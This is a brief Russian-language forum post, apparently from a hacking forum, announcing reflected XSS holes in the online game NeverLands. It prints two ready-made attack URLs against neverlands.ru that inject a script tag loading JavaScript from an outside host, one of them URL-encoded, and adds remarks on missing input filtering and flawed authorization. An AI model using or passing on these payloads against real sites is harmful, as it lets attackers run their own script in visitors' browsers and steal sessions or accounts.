Он-лайн игра NeverLands - XSS (passiv) В этой игре нашол XSS. Code: http://neverlands.ru/ch.php?lo=1&r=><script src=http://esteam.net.ru/script.js></script> Несомневаюсь что есть ещё чтото щас дальше копать буду .
А вот ещё одна прямо на главной Code: http://neverlands.ru/index.cgi?error=block&block=%3C/SCRIPT%3E%3Cscript%20src=http://esteam.net.ru/script.js%3E%3C/script%3E
Проект вообще очень сырой... Там такие баги были детские... Не было фильтрации минуса, например... Авторизация у них тоже с глюками была...